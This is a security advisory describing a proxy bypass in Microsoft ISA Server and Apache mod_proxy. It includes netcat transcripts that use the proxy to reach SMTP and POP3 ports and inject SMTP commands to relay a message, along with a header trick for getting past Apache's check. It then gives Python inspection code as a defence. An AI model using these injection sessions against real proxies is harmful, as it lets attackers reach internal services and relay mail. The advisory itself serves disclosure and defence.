Multiple proxy server bypass

-------------------------------------------------------

Once again, a pentest revealed some security flaws in well-known software.

This time I found a way to bypass a Microsoft ISA Server firewall/proxy. Other proxies seem to be vulnerable as well.

--- THE FLAW ---

It is possible to bypass the ISA proxy to reach non-HTTP services. In the next example you can see how it is possible to get the banner of an SMTP server through the ISA.

C:\>nc -vv X.X.X.X 8080
Warning: forward host lookup failed XXXXX: h_errno 11004: NO_DATA
XXXXX [X.X.X.X] 8080 (?) open
GET http://Y.Y.Y.Y:25 HTTP/1.0

220 XXXXXX ESMTP Service (Lotus Domino Release 5.0.6a) ready at Fri, 12 Jun 2004 17:08:26 +0200

This is a simple example, but looking at the next one will give you the key to understanding why this is a security flaw.

Now I connect to a POP3 service through the M$ ISA:

C:\>nc -vv X.X.X.X 8080
Warning: forward host lookup failed for XXX: h_errno 11004: NO_DATA
XXXXXXX [X.X.X.X] 8080 (?) open
GET http://Y.Y.Y.Y:110 HTTP/1.0

+OK Lotus Notes POP3 server version X2.0 ready on XXX.
-ERR Unknown command: "GET / HTTP/1.0"
-ERR Unknown command: "Via: 1.0 PROXY"
-ERR Unknown command: "Host: Y.Y.Y.Y:110"
-ERR Unknown command: "Connection: Keep-Alive"
-ERR Unknown command: ""
^C
C:\>

As you can see, the HTTP headers added by ISA are interpreted by the end server as commands... So, what will happen if we append commands right after our GET request line?

C:\>nc -vv X.X.X.X 8080
Warning: forward host lookup failed for XXX: h_errno 11004: NO_DATA
XXX [X.X.X.X] 8080 (?) open
GET http://Y.Y.Y.Y:25 HTTP/1.0
helo condor
mail from:<bla@foo.com>
rcpt to:<bla@somesite.com>
data
It works!
.
quit

220 XXX ESMTP Service (Lotus Domino Release 5.0.6a) ready at Fri, 12 Jun 2004 18:17:15 +0200
500 Syntax error, command "GET / HTTP/1.0" unrecognized
500 Syntax error, command "Via: 1.0 PROXY" unrecognized
500 Syntax error, command "Host: Y.Y.Y.Y:25" unrecognized
250 XXX Hello condor ([Y.Y.Y.Y]), pleased to meet you
250 bla@foo.com... Sender OK
250 bla@somesite.com... Recipient OK
354 Enter message, end with "." on a line by itself
250 Message accepted for delivery
221 XXX SMTP Service closing transmission channel
sent 141, rcvd 597: NOTSOCK

C:\>


Yes, so here you have an example of how this can be exploited. Blocking access to non-standard HTTP ports is not always possible, so the solution seems to be some kind of HTTP protocol inspection: the proxy should only forward requests that are syntactically HTTP, and only relay replies that are HTTP responses.

It is known that other proxies are "vulnerable". As an example, Apache mod_proxy seems to be affected (thanks to Ripe from www.7a69zine.org for checking this). Anyway, there's a little problem: the Apache proxy checks for the presence of ":" in all headers... (thanks to Lluis Mora from Sentryware). Ripe told me that he tricks the proxy by using a "Content-Lengh" header, where he can inject the commands to be interpreted by the SMTP server.
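The following is an added example of the kind of HTTP protocol inspection suggested above; it is not code from ISA Server, Apache mod_proxy, or the infohacking team. It shows two checks a forward proxy can apply: request-side inspection (absolute http:// URI, port on an allowlist, every line after the request line shaped like a "Name: value" header, no body on a GET), which catches the netcat sessions shown above, and response-side inspection (the origin must answer with an HTTP status line), which also catches the Apache case where the injected text does contain ":" and therefore passes a header-syntax check. The port allowlist, the function names and the sample messages are assumptions constructed for this example.

```python
"""Minimal HTTP protocol inspection for a forward proxy.

Example code, not ISA Server or Apache mod_proxy code. The sample
messages below are constructed to mirror the advisory's netcat sessions.
"""
import re
from typing import List, Optional, Tuple

# Assumed policy: absolute-URI targets may only use ports where HTTP is expected.
ALLOWED_HTTP_PORTS = {80, 8080, 8000}

REQUEST_LINE_RE = re.compile(
    r"^(GET|HEAD|POST|PUT|DELETE|OPTIONS|TRACE) (\S+) HTTP/1\.[01]$")
ABS_URI_RE = re.compile(r"^http://([A-Za-z0-9.\-]+)(?::(\d{1,5}))?(/\S*)?$")
# RFC 7230 token for the field name, then ':', then any value (may be empty).
# SMTP verbs such as "helo condor" or "mail from:<x>" do not fit this shape.
HEADER_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+:[ \t]*[^\r\n]*$")
STATUS_LINE_RE = re.compile(r"^HTTP/1\.[01] [1-5][0-9]{2}(?: .*)?$")
METHODS_WITHOUT_BODY = {"GET", "HEAD", "OPTIONS", "TRACE", "DELETE"}


def _split_message(raw: str) -> Tuple[str, List[str], str]:
    """Split an HTTP message into (start line, header lines, body); tolerates bare LF."""
    text = raw.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.rstrip("\n").split("\n")
    return lines[0], lines[1:], body


def inspect_request(raw: str) -> Optional[str]:
    """Return None if the client request may be forwarded, else the reason to drop it."""
    start, headers, body = _split_message(raw)
    m = REQUEST_LINE_RE.match(start)
    if not m:
        return "malformed request line"
    method, target = m.group(1), m.group(2)
    u = ABS_URI_RE.match(target)
    if not u:
        return "request target is not an absolute http:// URI"
    port = int(u.group(2) or 80)
    if port not in ALLOWED_HTTP_PORTS:
        return f"port {port} is not an allowed HTTP port"
    for line in headers:
        if not HEADER_RE.match(line):
            return f"non-header line in header section: {line!r}"
    if body and method in METHODS_WITHOUT_BODY:
        return f"{method} request carries a body"
    return None


def inspect_response(raw: str) -> Optional[str]:
    """Return None if the origin's reply is HTTP, else the reason to drop it.

    An SMTP or POP3 banner ("220 ...", "+OK ...") fails this check even when
    the request itself looked like well-formed HTTP.
    """
    start, headers, _ = _split_message(raw)
    if not STATUS_LINE_RE.match(start):
        return f"origin did not answer with an HTTP status line: {start!r}"
    for line in headers:
        if not HEADER_RE.match(line):
            return f"non-header line in response: {line!r}"
    return None


# Constructed samples modelled on the advisory's sessions (Y.Y.Y.Y is a placeholder).
SAMPLE_INJECTED_REQUEST = "GET http://Y.Y.Y.Y:25 HTTP/1.0\nhelo condor\n\n"
SAMPLE_SMTP_BANNER = "220 XXX ESMTP Service (Lotus Domino Release 5.0.6a) ready\r\n"
SAMPLE_GOOD_REQUEST = "GET http://example.test/ HTTP/1.0\r\nHost: example.test\r\n\r\n"

if __name__ == "__main__":
    print(inspect_request(SAMPLE_INJECTED_REQUEST))
    print(inspect_response(SAMPLE_SMTP_BANNER))
    print(inspect_request(SAMPLE_GOOD_REQUEST))
```

Note that the request-side check alone is not enough: a client can hide the injected text inside a syntactically valid header value or a POST body, which is why the origin's reply is checked as well. Only a proxy that refuses to relay a non-HTTP reply turns the open relay shown above into a dropped connection.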

Other proxies may be affected by this problem. Other attack vectors also exist for this flaw, such as the possibility of accessing services other than SMTP.

Bugtraq was notified by Infohacking on 19-06-04 regarding the ISA flaw. Apache.org was notified by 7a69zine.org on 26-06-04.

In the case of the Apache team, the response to the 7a69zine crew was very fast and they confirmed the problem, but there does not seem to be an easy way to patch it at the moment.

-------------------------------------------------------

Infohacking Team: Hugo Vazquez Carames & Toni Cortes Martinez

Copyright © 2001 All rights reserved.